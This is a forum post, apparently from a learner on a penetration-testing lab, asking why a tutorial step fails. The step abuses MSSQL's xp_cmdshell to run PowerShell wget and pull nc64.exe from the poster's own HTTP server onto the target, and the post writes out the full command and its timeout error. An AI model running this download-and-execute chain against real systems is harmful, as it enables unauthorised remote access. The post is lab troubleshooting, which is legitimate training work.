Hi all,
I’m working my way through the tutorials and have run into a problem that I just cannot resolve, including stopping and starting a new box. I am following the tutorial 100%. Here is what I’ve done so far:
- Log into mssql using impacket mssqlclient and found password → no problem
- Enable xp_commandshell and test with
EXEC xp_cmdshell 'net user';→ no problem - Start http server (tested also with different ports) in same location as nc64.exe → no problem
- Issue command to to change location to download,
wgetfrom my server, and copy nc64.exe → here comes the problem. Full command:xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.xxx.xxx:8000/nc64.exe -outfile nc64.exe"
As soon as I issue the command, I see a hit on my server: GET /nc64.exe HTTP/1.1" 200 -
But the sql terminal hangs for a while, and then fails with the following error:
wget : The operation has timed out.
At line:1 char:32
+ ... \Downloads; wget http://10.10.14.215:8088/nc64.exe -outfile nc64-2.ex ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
When I do xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads" I can see the file created, but with 0 length.
I’ve tried different version of the same commands from other tutorials, different http ports, I’ve killed and restarted the machine… Nothing I do is making a difference. I’m using Kali Linux.
Really hoping for a pointer in the right direction here.
Many thanks